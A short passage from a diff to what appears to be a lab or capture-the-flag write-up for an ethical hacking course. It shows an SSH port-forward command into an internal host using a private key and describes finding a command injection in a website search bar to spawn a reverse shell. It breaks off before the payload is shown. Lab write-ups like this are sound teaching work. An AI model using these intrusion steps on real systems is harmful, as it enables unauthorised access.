Owanesh/ETH2324/docs/REPORT.md

 ```sh
 ssh -L 9090:localhost:3100 saltbae@192.168.1.151 -i id_rsa
 ```
-To do this though we need the private ssh key which we already have (if we traversed the easy path) or we could just simply copy it from the reverse shell we got (?).
+To do this though we need the private ssh key which we already have (if we traversed the easy path) or we could just simply create another pair.
 After that we contact localhost:9090 and we are greeted with a meat store!
 VC0RP must be into some shady things…

 We start to play with the website until we find the `/resellers` page.
 This page presents a search bar used to find meat resellers in the world.
 This search bar presents yet another command injection vulnerability.
 With the following payload we spawn a reverse shell:
 ```sh